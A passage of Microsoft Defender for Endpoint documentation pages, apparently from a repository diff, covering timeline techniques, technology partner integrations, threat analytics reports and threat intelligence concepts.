-In Microsoft Defender for Endpoint, **Techniques** are an additional data type in the event timeline. Techniques provide more insight on activities associated with [MITRE ATT&CK](https://attack.mitre.org/) techniques or sub-techniques.
-
-This feature simplifies the investigation experience by helping analysts understand the activities that were observed on a device. Analysts can then decide to investigate further.
-
-For public preview, Techniques are available by default and shown together with events when a device's timeline is viewed.
--
-Techniques are highlighted in bold text and appear with a blue icon on the left. The corresponding MITRE ATT&CK ID and technique name also appear as tags under Additional information.
-
-Search and Export options are also available for Techniques.
-
-## Investigate using the side pane
-
-Select a Technique to open its corresponding side pane. Here you can see additional information and insights like related ATT&CK techniques, tactics, and descriptions.
-
-Select the specific *Attack technique* to open the related ATT&CK technique page where you can find more information about it.
-
-You can copy an entity's details when you see a blue icon on the right. For instance, to copy a related file's SHA1, select the blue page icon.
--
-You can do the same for command lines.
--
-## Investigate related events
-
-To use [advanced hunting](advanced-hunting-overview.md) to find events related to the selected Technique, select **Hunt for related events**. This leads to the advanced hunting page with a query to find events related to the Technique.
--
-> [!NOTE]
-> Querying using the **Hunt for related events** button from a Technique side pane displays all the events related to the identified technique but does not include the Technique itself in the query results.
-
-## Customize your device timeline
-
-On the upper right-hand side of the device timeline, you can choose a date range to limit the number of events and techniques in the timeline.
-
-You can customize which columns to expose. You can also filter for flagged events by data type or by event group.
-
-### Choose columns to expose
-
-You can choose which columns to expose in the timeline by selecting the **Choose columns** button.
---
-From there you can select which information set to include.
-
-### Filter to view techniques or events only
-
-To view only either events or techniques, select **Filters** from the device timeline and choose your preferred Data type to view.
--
-## See also
--- [View and organize the Devices list](machines-view-overview.md)-- [Microsoft Defender for Endpoint device timeline event flags](device-timeline-event-flag.md)
security Technological Partners https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/technological-partners.md
- Title: Technological partners of Microsoft Defender XDR-
-description: View technological partners of Microsoft 365 Defender to enhance detection, investigation, and threat intelligence capabilities of the platform.
------- m365-security-- tier3- Previously updated : 08/03/2023--
-# Technological partners of Microsoft Defender XDR
-
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender for Endpoint-- Microsoft Defender for Vulnerability Management-- Microsoft Defender for Office 365-- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-Microsoft Defender XDR supports third-party integrations to help secure users with effective threat protection, detection, investigation, and response, in various security fields of endpoints, vulnerability management, email, identities, cloud apps.
-
-The following are the solution's categories:
--- Security information and event management (SIEM)-- Security orchestration, automation, and response (SOAR)-- Breach and attack simulation (BAS)-- Threat intelligence-- Network security/ DNS security-- Identity security-- Cross platform-- Business cloud applications-- Threat and vulnerability management-- Secure service edge-- Other integrations-
-## Supported integrations and partners
-
-### Security information and event management (SIEM)
-
-|Product name|Vendor|Description|
-||||
-|[Microsoft Sentinel](/azure/sentinel/microsoft-365-defender-sentinel-integration)|Microsoft|Microsoft Sentinel is a scalable, cloud-native, security information and event management (SIEM) and security orchestration, automation, and response (SOAR) solution. Microsoft Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for attack detection, threat visibility, proactive hunting, and threat response.|
-|[Splunk](https://go.microsoft.com/fwlink/?linkid=2201963)|Splunk|The Microsoft Defender for Endpoint Add-on allows Splunk users to ingest all of the alerts and supporting information to their Splunk.|
-|[ArcSight](https://go.microsoft.com/fwlink/?linkid=2202142)|Micro Focus|ArcSight allows multiple analytics capabilities for correlation, search, UEBA, enhanced and automated response, and log management.|
-|[Elastic Security](https://go.microsoft.com/fwlink/?linkid=2201772)|Elastic|Elastic Security combines SIEM threat detection features with endpoint prevention and response capabilities in one solution.|
-|[IBM Security QRadar SIEM](https://go.microsoft.com/fwlink/?linkid=2201876)|IBM|IBM Security QRadar SIEM enables centralized visibility and intelligent security analytics to detect, investigate and respond to your critical cybersecurity threats.|
-|[AttackIQ Platform](https://go.microsoft.com/fwlink/?linkid=2201971)|AttackIQ|AttackIQ Platform validates whether MDE is configured properly by launching continuous attacks safely on production assets.|
-
-### Security orchestration, automation, and response (SOAR)
-
-|Product name|Vendor|Description|
-||||
-|[Microsoft Sentinel](https://go.microsoft.com/fwlink/?linkid=2201962)|Microsoft|Microsoft Sentinel is a scalable, cloud-native, security information and event management (SIEM) and security orchestration, automation, and response (SOAR) solution. Microsoft Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for attack detection, threat visibility, proactive hunting, and threat response.|
-|[ArcSight](https://go.microsoft.com/fwlink/?linkid=2202142)|Micro Focus|ArcSight provides multiple analytics capabilities for correlation, search, UEBA, enhanced and automated response, and log management.|
-|[Splunk SOAR](https://go.microsoft.com/fwlink/?linkid=2201773)|Splunk|Splunk SOAR orchestrates workflows and automates tasks in seconds to work smarter and respond faster.|
-|[Security Incident Response](https://go.microsoft.com/fwlink/?linkid=2201874)|ServiceNow|The ServiceNow&reg; Security Incident Response application tracks the progress of security incidents from discovery and initial analysis, through containment, eradication, and recovery, and into the final post-incident review, knowledge base article creation, and closure.|
-|[Swimlane](https://go.microsoft.com/fwlink/?linkid=2202140)|Swimlane Inc|Automates your incident response capabilities with Swimlane (SOAR) and Microsoft Defender.|
-|[InsightConnect](https://go.microsoft.com/fwlink/?linkid=2201877)|Rapid7|InsightConnect provides security orchestration, automation, and response solution that accelerates incident response and vulnerability management processes.|
-|[Demisto, a Palo Alto Networks Company](https://go.microsoft.com/fwlink/?linkid=2201777)|Palo Alto Networks|Demisto integrates with Microsoft Defender for Endpoint to enable security teams to orchestrate and automate endpoint security monitoring, enrichment, and response.|
-
-### Breach and attack simulation (BAS)
-
-|Product name|Vendor|Description|
-||||
-|[SafeBreach](https://go.microsoft.com/fwlink/?linkid=2201775)|SafeBreach|SafeBreach continuously executes attacks, correlates results to help visualize security gaps, and uses contextual insights to highlight remediation efforts. With its Hacker's Playbook&trade;, the industry's most extensive collection of attack data enabled by state-of-the-art threat intelligence research, SafeBreach empowers organizations to get proactive about security with a simple approach that replaces hope with data.|
-|[Extended Security Posture Management (XSPM)](https://go.microsoft.com/fwlink/?linkid=2201771)|Cymulate|Cymulate's Extended Security Posture Management enables companies to challenge, assess, and optimize their cybersecurity posture.|
-|[Vulnerability Control](https://go.microsoft.com/fwlink/?linkid=2201967)|SkyBox|Develops a vulnerability program strategy that accurately analyzes exposure risk across hybrid attack surface and prioritize the remediation.|
-|[Attack Path Management](https://go.microsoft.com/fwlink/?linkid=2201774)|XM Cyber|Attack Path Management is a hybrid cloud security company providing attack path management changing the ways organizations approach cyber risk.|
-|[Better Mobile Security Platform](https://go.microsoft.com/fwlink/?linkid=2202043)|Better Mobile Security Inc.|Provides solution for Threat, Phishing, and Privacy Protection and Simulation.|
-
-### Threat intelligence
-
-|Product name|Vendor|Description|
-||||
-|[ArcSight](https://go.microsoft.com/fwlink/?linkid=2202142)|Micro Focus|Provides multiple analytics capabilities for correlation, search, UEBA, enhanced and automated response, and log management.|
-|[MineMeld](https://go.microsoft.com/fwlink/?linkid=2202044)|Palo Alto Networks|Enriches your endpoint protection by extending Autofocus and other threat feeds to Microsoft Defender for Endpoint using MineMeld.|
-|[MISP (Malware Information Sharing Platform)](https://go.microsoft.com/fwlink/?linkid=2202247)|MISP|Integrates threat indicators from the Open Source Threat Intelligence Sharing Platform into your Microsoft Defender for Endpoint environment.|
-|[ThreatConnect](https://go.microsoft.com/fwlink/?linkid=2202246)|ThreatConnect|Alerts and/or blocks on custom threat intelligence from ThreatConnect Playbooks using Microsoft Defender for Endpoint indicators.|
-
-### Network security/ DNS security
-
-|Product name|Vendor|Description|
-||||
-|[Aruba ClearPass Policy Manager](https://go.microsoft.com/fwlink/?linkid=2201878)|Aruba, a Hewlett Packard Enterprise company|Network Access Control applies consistent policies and granular security controls to wired and wireless networks|
-|[Vectra Network Detection and Response (NDR)](https://go.microsoft.com/fwlink/?linkid=2201969)|Vectra|Vectra applies AI & security research to detect and respond to cyber-attacks in real time.|
-|[Blue Hexagon for Network](https://go.microsoft.com/fwlink/?linkid=2201780)|Blue Hexagon|Blue Hexagon built the industry's first real-time deep learning platform for network threat protection.|
-|[CyberMDX](https://go.microsoft.com/fwlink/?linkid=2201880)|CyberMDX|Cyber MDX integrates comprehensive healthcare assets visibility, threat prevention and repose into your Microsoft Defender for Endpoint environment.|
-|[HYAS Protect](https://www.hyas.com/hyas-protect)|HYAS|HYAS Protect utilizes authoritative knowledge of attacker infrastructure to proactively protect MDE endpoints from cyber attacks.|
-|[Better Mobile Security Platform](https://go.microsoft.com/fwlink/?linkid=2202043)|Better Mobile Security Inc.|Provides solution for Threat, Phishing, and Privacy Protection and Simulation.|
-|[Vulnerability Control](https://go.microsoft.com/fwlink/?linkid=2201965)|Skybox security|Global security posture management leader with solutions for vulnerability management and network security policy management.|
-
-### Identity security
-
-|Product name|Vendor|Description|
-||||
-|[Illusive Platform](https://go.microsoft.com/fwlink/?linkid=2201778)|Illusive Networks|Illusive continuously discovers and automatically remediates identity vulnerabilities, and it detects attacks using deceptive controls.|
-|[Silverfort](https://go.microsoft.com/fwlink/?linkid=2201873)|Silverfort|Enforces Microsoft Entra Conditional Access and MFA across any user system and environment on-premises and in the cloud.|
-
-### Cross platform
-
-|Product name|Vendor|Description|
-||||
-|[Corrata Mobile Security](https://go.microsoft.com/fwlink/?linkid=2201879)|Corrata|Corrata is an immune system for mobile devices and tablets that detects & protects mobile devices from the full spectrum of security threats like phishing, malware, man-in-the-middle attacks, and data loss.|
-|[Better Mobile Security Platform](https://go.microsoft.com/fwlink/?linkid=2202043)|Better Mobile Security Inc.|Provides solution for Threat, Phishing, and Privacy Protection and Simulation.|
-|[Zimperium Mobile Threat Defense](https://go.microsoft.com/fwlink/?linkid=2202141)|Zimperium|Extends your Microsoft Defender for Endpoint to iOS and Android with Machine Learning-based Mobile Threat Defense.|
-|[Bitdefender](https://go.microsoft.com/fwlink/?linkid=2201968)|Bitdefender|Bitdefender GravityZone is a layered next generation endpoint protection platform offering comprehensive protection against the full spectrum of sophisticated cyber threats.|
-
-### Business cloud applications
-
-|Product name|Vendor|Description|
-||||
-|[Atlassian](https://go.microsoft.com/fwlink/?linkid=2202039)|Atlassian|Atlassian provides collaboration, development, and issue tracking software for teams.|
-|[Azure](https://go.microsoft.com/fwlink/?linkid=2202040)|Microsoft|Microsoft Azure provides tools and services to help you reach and scale to a global audience with cloud gaming services.|
-|[AWS](https://go.microsoft.com/fwlink/?linkid=2202041)|Amazon|Amazon Web Services provides information technology infrastructure services to businesses in the form of web services.|
-|[Box](https://go.microsoft.com/fwlink/?linkid=2202042)|Box|Box is an online file sharing and cloud content management service offering unlimited storage, custom branding, and administrative controls.|
-|[DocuSign](https://go.microsoft.com/fwlink/?linkid=2201767)|DocuSign|DocuSign is an Electronic Signature and Agreement Cloud enabling employees to securely send, sign and manage agreements.|
-|[Dropbox](https://go.microsoft.com/fwlink/?linkid=2202139)|Dropbox|Dropbox is a smart workspace company that provides secure file sharing, collaboration, and storage solutions.|
-|[Egnyte](https://go.microsoft.com/fwlink/?linkid=2201956)|Egnyte|Egnyte delivers secure content collaboration, compliant data protection and simple infrastructure modernization.|
-|[GITHUB](https://go.microsoft.com/fwlink/?linkid=2201957)|Microsoft|GitHub is a code hosting platform for collaboration and version control. It allows developers to work together on their projects right from planning and coding to shipping the software.|
-|[Google Workspace](https://go.microsoft.com/fwlink/?linkid=2201958)|Alphabet|Google Workspace plans provide a custom email for your business and includes collaboration tools like Gmail, Calendar, Meet, Chat, Drive, Docs, Sheets, Slides, Forms, Sites, and more.|
-|[Google Cloud Platform](https://go.microsoft.com/fwlink/?linkid=2202244)|Alphabet|Google Cloud Platform is a set of modular cloud-based services that allows you to create anything from simple websites to complex applications.|
-|[NetDocuments](https://go.microsoft.com/fwlink/?linkid=2201768)|NetDocuments|NetDocuments enables businesses of all sizes to create, secure, manage, access, and collaborate on documents and email anywhere, anytime.|
-|[Office 365](https://go.microsoft.com/fwlink/?linkid=2201959)|Microsoft|Microsoft Office 365 is a subscription-based online office and software services suite, which offers access to various services and software built around the Microsoft Office platform.|
-|[OKTA](https://go.microsoft.com/fwlink/?linkid=2201867)|OKTA|Okta is a management platform that secures critical resources from cloud to ground for workforce and customers.|
-|[OneLogin](https://go.microsoft.com/fwlink/?linkid=2201868)|OneLogin|OneLogin is a cloud identity and access management solution that enables enterprises to secure all apps for their users on all devices.|
-|[Salesforce](https://go.microsoft.com/fwlink/?linkid=2201869)|Salesforce|Salesforce is a global cloud computing company that offers customer relationship management (CRM) software & cloud computing for businesses of all sizes.|
-|[ServiceNow](https://go.microsoft.com/fwlink/?linkid=2201769)|ServiceNow|ServiceNow provides cloud-based solutions that define, structure, manage, and automate services for enterprise operations.|
-|[Slack](https://go.microsoft.com/fwlink/?linkid=2201870)|Slack|Slack is an enterprise software platform that allows teams and businesses of all sizes to communicate effectively.|
-|[SmartSheet](https://go.microsoft.com/fwlink/?linkid=2201871)|SmartSheet|Smartsheet is a cloud-based work management platform that empowers collaboration, drives better decision making, and accelerates innovation.|
-|[Webex](https://go.microsoft.com/fwlink/?linkid=2201872)|Cisco|Webex, a Cisco company, provides on-demand applications for businesses to conduct web conferencing, telework, and application remote control.|
-|[Workday](https://go.microsoft.com/fwlink/?linkid=2201960)|Workday|Workday offers enterprise-level software solutions for human resource and financial management.|
-|[Zendesk](https://go.microsoft.com/fwlink/?linkid=2201961)|Zendesk|Zendesk is a customer service platform that develops software to empower organization and customer relationships.|
-
-### Threat and vulnerability management
-
-|Product name|Vendor|Description|
-||||
-|[Attack Path Management](https://go.microsoft.com/fwlink/?linkid=2201774)|XM Cyber|Hybrid cloud security company providing attack path management changing the ways organizations approach cyber risk.|
-|[Corrata Mobile Security](https://go.microsoft.com/fwlink/?linkid=2201879)|Corrata|Corrata is an immune system for mobile devices and tablets that detects & protects mobile devices from the full spectrum of security threats like phishing, malware, man-in-the-middle attacks, and data loss.|
-|[Zimperium Mobile Threat Defense](https://go.microsoft.com/fwlink/?linkid=2202141)|Zimperium|Extend your Microsoft Defender for Endpoint to iOS and Android with Machine Learning-based Mobile Threat Defense.|
-|[RiskAnalyzer](https://go.microsoft.com/fwlink/?linkid=2202245)|DeepSurface Security|DeepSurface RiskAnalyzer helps quickly and efficiently discover, analyze and prioritize cybersecurity risk.|
-|[Vulnerability Control](https://go.microsoft.com/fwlink/?linkid=2201965)|Skybox security|Global security posture management leader with solutions for vulnerability management and network security policy management.|
-|[Vulcan Cyber risk management platform](https://go.microsoft.com/fwlink/?linkid=2201770)|Vulcan Cyber|Vulcan Cyber gives you the tools to effectively manage the vulnerability and risk lifecycle for all your cyber assets, including application, cloud, and infrastructure.|
-|[Extended Security Posture Management (XSPM)](https://go.microsoft.com/fwlink/?linkid=2201771)|Cymulate|Cymulate's Extended Security Posture Management enables companies to challenge, assess, and optimize their cybersecurity posture.|
-|[Illusive Platform](https://go.microsoft.com/fwlink/?linkid=2201778)|Illusive Networks|Illusive continuously discovers and automatically remediates identity vulnerabilities, and it detects attacks using deceptive controls.|
-|[ServiceNow vulnerability response](https://go.microsoft.com/fwlink/?linkid=2243580)| ServiceNow | Use the Microsoft Threat and vulnerability management integration to import third-party scanner data about your assets and vulnerabilities. You can then view reports about vulnerabilities and vulnerable items on the Vulnerability Response dashboards.
-
-### Secure service edge
-
-|Product name|Vendor|Description|
-||||
-|[Zscaler Internet Access](https://go.microsoft.com/fwlink/?linkid=2201779)|Zscaler|Zscaler Internet Access is a cloud native security service edge (SSE) solution that builds on a decade of secure web gateway leadership. Offered as a scalable SaaS platform from the world's largest security cloud, it replaces legacy network security solutions to stop advanced attacks and prevent data loss with a comprehensive zero trust approach.|
-
-### Additional integrations
-
-|Product name|Vendor|Description|
-||||
-|[Morphisec](https://go.microsoft.com/fwlink/?linkid=2201966)|Morphisec|Provides Moving Target Defense-powered advanced threat prevention and integrates forensics data directly into Microsoft Defender XDR dashboards to help prioritize alerts, determine device at-risk score and visualize full attack timeline including internal memory information.|
-|[THOR Cloud](https://go.microsoft.com/fwlink/?linkid=2201875)|Nextron systems|Provides on-demand live forensics scans using a signature base focused on persistent threats.|
-
-## Recommended content
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Connect apps to get visibility and control|Microsoft Docs](/defender-cloud-apps/enable-instant-visibility-protection-and-governance-actions-for-your-apps)-- [Partner applications in Microsoft Defender for Endpoint|Microsoft Docs](partner-applications.md)
security Threat Analytics Analyst Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-analytics-analyst-reports.md
- Title: Understand the analyst report section in threat analytics.-
-description: How the report section of threat analytics reports provides information about threats, mitigation, detections, advanced hunting queries, and more.
------- m365-security-- tier2-- mde-edr-- Previously updated : 12/18/2020--
-# The analyst report in threat analytics
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Each [threat analytics report](threat-analytics.md) includes dynamic sections and a comprehensive written section called the _analyst report_. To access this section, open the report about the tracked threat and select the **Analyst report** tab.
--
-_Analyst report section of a threat analytics report_
-
-## Scan the analyst report
-
-Each section of the analyst report is designed to provide actionable information. While reports vary, most reports include the sections described in the following table.
-
-<br>
-
-****
-
-|Report section|Description|
-|||
-|Executive summary|Overview of the threat, including when it was first seen, its motivations, notable events, major targets, and distinct tools and techniques. You can use this information to further assess how to prioritize the threat in the context of your industry, geographic location, and network.|
-|Analysis|Technical information about the threats, including the details of an attack and how attackers might utilize a new technique or attack surface|
-|MITRE ATT&CK techniques observed|How observed techniques map to the [MITRE ATT&CK attack framework](https://attack.mitre.org/)|
-|[Mitigations](#apply-additional-mitigations)|Recommendations that can stop or help reduce the impact of the threat. This section also includes mitigations that aren't tracked dynamically as part of the threat analytics report.|
-|[Detection details](#understand-how-each-threat-can-be-detected)|Specific and generic detections provided by Microsoft security solutions that can surface activity or components associated with the threat.|
-|[Advanced hunting](#find-subtle-threat-artifacts-using-advanced-hunting)|[Advanced hunting queries](advanced-hunting-overview.md) for proactively identifying possible threat activity. Most queries are provided to supplement detections, especially for locating potentially malicious components or behaviors that couldn't be dynamically assessed to be malicious.|
-|References|Microsoft and third-party publications referenced by analysts during the creation of the report. Threat analytics content is based on data validated by Microsoft researchers. Information from publicly available, third-party sources are identified clearly as such.|
-|Change log|The time the report was published and when significant changes were made to the report.|
-|
-
-## Apply additional mitigations
-
-Threat analytics dynamically tracks the [status of security updates and secure configurations](threat-analytics.md#mitigations-review-list-of-mitigations-and-the-status-of-your-devices). This information is available as charts and tables in the **Mitigations** tab.
-
-In addition to these tracked mitigations, the analyst report also discusses mitigations that are _not_ dynamically monitored. Here are some examples of important mitigations that are not dynamically tracked:
--- Block emails with _.lnk_ attachments or other suspicious file types-- Randomize local administrator passwords-- Educate end users about phishing email and other threat vectors-- Turn on specific [attack surface reduction rules](attack-surface-reduction.md)-
-While you can use the **Mitigations** tab to assess your security posture against a threat, these recommendations let you take additional steps towards improving your security posture. Carefully read all the mitigation guidance in the analyst report and apply them whenever possible.
-
-## Understand how each threat can be detected
-
-The analyst report also provides the detections from Microsoft Defender Antivirus and _endpoint detection and response_ (EDR) capabilities.
-
-### Antivirus detections
-
-These detections are available on devices with [Microsoft Defender Antivirus](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-in-windows-10) turned on. When these detections occur on devices that have been onboarded to Microsoft Defender for Endpoint, they also trigger alerts that light up the charts in the report.
-
-> [!NOTE]
-> The analyst report also lists **generic detections** that can identify a wide-range of threats, in addition to components or behaviors specific to the tracked threat. These generic detections don't reflect in the charts.
-
-### Endpoint detection and response (EDR) alerts
-
-EDR alerts are raised for [devices onboarded to Microsoft Defender for Endpoint](onboard-configure.md). These alerts generally rely on security signals collected by the Microsoft Defender for Endpoint sensor and other endpoint capabilities (such as antivirus, network protection, tamper protection) that serve as powerful signal sources.
-
-Like the list of antivirus detections, some EDR alerts are designed to generically flag suspicious behavior that might not be associated with the tracked threat. In such cases, the report will clearly identify the alert as "generic" and that it doesn't influence any of the charts in the report.
-
-## Find subtle threat artifacts using advanced hunting
-
-While detections allow you to identify and stop the tracked threat automatically, many attack activities leave subtle traces that require additional inspection. Some attack activities exhibit behaviors that can also be normal, so detecting them dynamically can result in operational noise or even false positives.
-
-[Advanced hunting](advanced-hunting-overview.md) provides a query interface based on Kusto Query Language that simplifies locating subtle indicators of threat activity. It also allows you to surface contextual information and verify whether indicators are connected to a threat.
-
-Advanced hunting queries in the analyst reports have been vetted by Microsoft analysts and are ready for you to run in the [advanced hunting query editor](https://security.microsoft.com/advanced-hunting). You can also use the queries to create [custom detection rules](custom-detection-rules.md) that trigger alerts for future matches.
-
-## Related topics
--- [Threat analytics overview](threat-analytics.md)-- [Proactively find threats with advanced hunting](advanced-hunting-overview.md)-- [Custom detection rules](custom-detection-rules.md)
security Threat Analytics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-analytics.md
- Title: Track and respond to emerging threats with Microsoft Defender for Endpoint threat analytics-
-description: Understand emerging threats and attack techniques and how to stop them. Assess their impact to your organization and evaluate your organizational resilience.
-----
- - m365-security
- - m365initiative-defender-endpoint
- - tier1
- - mde-edr
-- Previously updated : 12/18/2023--
-# Track and respond to emerging threats through threat analytics
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-With more sophisticated adversaries and new threats emerging frequently and prevalently, it's critical to be able to quickly:
--- Assess the impact of new threats-- Review your resilience against or exposure to the threats-- Identify the actions you can take to stop or contain the threats-
-Threat analytics is a set of reports from expert Microsoft security researchers covering the most relevant threats, including:
--- Active threat actors and their campaigns-- Popular and new attack techniques-- Critical vulnerabilities-- Common attack surfaces-- Prevalent malware-
-Each report provides a detailed analysis of a threat and extensive guidance on how to defend against that threat. It also incorporates data from your network, indicating whether the threat is active and if you have applicable protections in place.
-
-Watch this short video to learn more about how threat analytics can help you track the latest threats and stop them.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bw1f]
-
-## Required roles and permissions
-The following table outlines the roles and permissions required to access Threat Analytics. Roles defined in the table below refer to custom roles in individual portals and are not connected to global roles in Microsoft Entra ID, even if similarly named.
-
-| **One of the following roles are required for Microsoft Defender XDR** | **One of the following roles are required for Defender for Endpoint** | **One of the following roles are required for Defender for Office 365** | **One of the following roles are required for Defender for Cloud Apps** |
-|||||
-| Threat Analytics | Alerts and incidents data: <ul><li>View data- security operations</li></ul>Defender Vulnerability Management mitigations:<ul><li>View data - Threat and vulnerability management</li></ul> | Alerts and incidents data:<ul> <li>View-only manage alerts</li> <li>Manage alerts</li> <li>Organization configuration</li><li>Audit logs</li> <li>View-only audit logs</li><li>Security reader</li> <li>Security admin</li><li>View-only recipients</li> </ul> Prevented email attempts: <ul><li>Security reader</li> <li>Security admin</li><li>View-only recipients</li> | Not available for Defender for Cloud Apps or MDI users |
-
-## View the threat analytics dashboard
-
-The threat analytics dashboard is a great jump off point for getting to the reports that are most relevant to your organization. It summarizes the threats in the following sections:
--- **Latest threats**: Lists the most recently published threat reports, along with the number of devices with active and resolved alerts.-- **High-impact threats**: Lists the threats that have had the highest impact to the organization. This section ranks threats by the number of devices that have active alerts.-- **Threat summary**: Shows the overall impact of tracked threats by showing the number of threats with active and resolved alerts.-
-Select a threat from the dashboard to view the report for that threat.
--
-## View a threat analytics report
-
-Each threat analytics report provides information in three sections: **Overview**, **Analyst report**, and **Mitigations**.
-
-### Overview: Quickly understand the threat, assess its impact, and review defenses
-
-The **Overview** section provides a preview of the detailed analyst report. It also provides charts that highlight the impact of the threat to your organization and your exposure through misconfigured and unpatched devices.
-
-_Overview section of a threat analytics report_
-
-#### Assess the impact to your organization
-
-Each report includes charts designed to provide information about the organizational impact of a threat:
--- **Devices with alerts**: Shows the current number of distinct devices that have been impacted by the threat. A device is categorized as **Active** if there is at least one alert associated with that threat and **Resolved** if *all* alerts associated with the threat on the device have been resolved.-- **Devices with alerts over time**: Shows the number of distinct devices with **Active** and **Resolved** alerts over time. The number of resolved alerts indicates how quickly your organization responds to alerts associated with a threat. Ideally, the chart should be showing alerts resolved within a few days.-
-#### Review security resilience and posture
-
-Each report includes charts that provide an overview of how resilient your organization is against a given threat:
--- **Security configuration status**: Shows the number of devices that have applied the recommended security settings that can help mitigate the threat. Devices are considered **Secure** if they have applied _all_ the tracked settings.-- **Vulnerability patching status**: Shows the number of devices that have applied security updates or patches that address vulnerabilities exploited by the threat.-
-### Analyst report: Get expert insight from Microsoft security researchers
-
-Go to the **Analyst report** section to read through the detailed expert write-up. Most reports provide detailed descriptions of attack chains, including tactics and techniques mapped to the MITRE ATT&CK framework, exhaustive lists of recommendations, and powerful [threat hunting](advanced-hunting-overview.md) guidance.
-
-[Learn more about the analyst report](threat-analytics-analyst-reports.md)
-
-### Mitigations: Review list of mitigations and the status of your devices
-
-In the **Mitigations** section, review the list of specific actionable recommendations that can help you increase your organizational resilience against the threat. The list of tracked mitigations includes:
--- **Security updates**: Deployment of security updates or patches for vulnerabilities-- **Microsoft Defender Antivirus settings**
- - Security intelligence version
- - Cloud-delivered protection
- - Potentially unwanted application (PUA) protection
- - Real-time protection
-
-Mitigation information in this section incorporates data from [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md), which also provides detailed drill-down information from various links in the report.
---
-_Mitigations section of a threat analytics report_
-
-## Additional report details and limitations
-
-When using the reports, keep the following in mind:
--- Data is scoped based on your role-based access control (RBAC) scope. You will see the status of devices in [groups that you can access](machine-groups.md).-- Charts reflect only mitigations that are tracked. Check the report overview for additional mitigations that are not shown in the charts.-- Mitigations don't guarantee complete resilience. The provided mitigations reflect the best possible actions needed to improve resiliency.-- Devices are counted as "unavailable" if they have not transmitted data to the service.-- Antivirus-related statistics are based on Microsoft Defender Antivirus settings. Devices with third-party antivirus solutions can appear as "exposed".-
-## Related topics
--- [Proactively find threats with advanced hunting](advanced-hunting-overview.md)-- [Understand the analyst report section](threat-analytics-analyst-reports.md)-- [Assess and resolve security weaknesses and exposures](next-gen-threat-and-vuln-mgt.md)
security Threat Indicator Concepts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-indicator-concepts.md
- Title: Understand threat intelligence concepts in Microsoft Defender for Endpoint
-description: Create custom threat alerts for your organization and learn the concepts around threat intelligence in Microsoft Defender for Endpoint
------- m365-security-- mde-edr-- Previously updated : 12/18/2020--
-# Understand threat intelligence concepts
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-threatindicator-abovefoldlink)
-
-Multiple complex malicious events, attributes, and contextual information comprise advanced cybersecurity attacks. Identifying and deciding which of these activities qualify as suspicious can be a challenging task. Your knowledge of known attributes and abnormal activities specific to your industry is fundamental in knowing when to call an observed behavior as suspicious.
-
-With Microsoft Defender XDR, you can create custom threat alerts that can help you keep track of possible attack activities in your organization. You can flag suspicious events to piece together clues and possibly stop an attack chain. These custom threat alerts will only appear in your organization and will flag events that you set it to track.
-
-Before creating custom threat alerts, it's important to know the concepts behind alert definitions and indicators of compromise (IOCs) and the relationship between them.
-
-## Alert definitions
-Alert definitions are contextual attributes that can be used collectively to identify early clues on a possible cybersecurity attack. These indicators are typically a combination of activities, characteristics, and actions taken by an attacker to successfully achieve the objective of an attack. Monitoring these combinations of attributes is critical in gaining a vantage point against attacks and possibly interfering with the chain of events before an attacker's objective is reached.
-
-## Indicators of compromise (IOC)
-IOCs are individually known malicious events that indicate that a network or device has already been breached. Unlike alert definitions, these indicators are considered as evidence of a breach. They're often seen after an attack has already been carried out and the objective has been reached, such as exfiltration. Keeping track of IOCs is also important during forensic investigations. Although it might not be able to intervene with an attack chain, gathering these indicators can be useful in creating better defenses for possible future attacks.
-
-## Relationship between alert definitions and IOCs
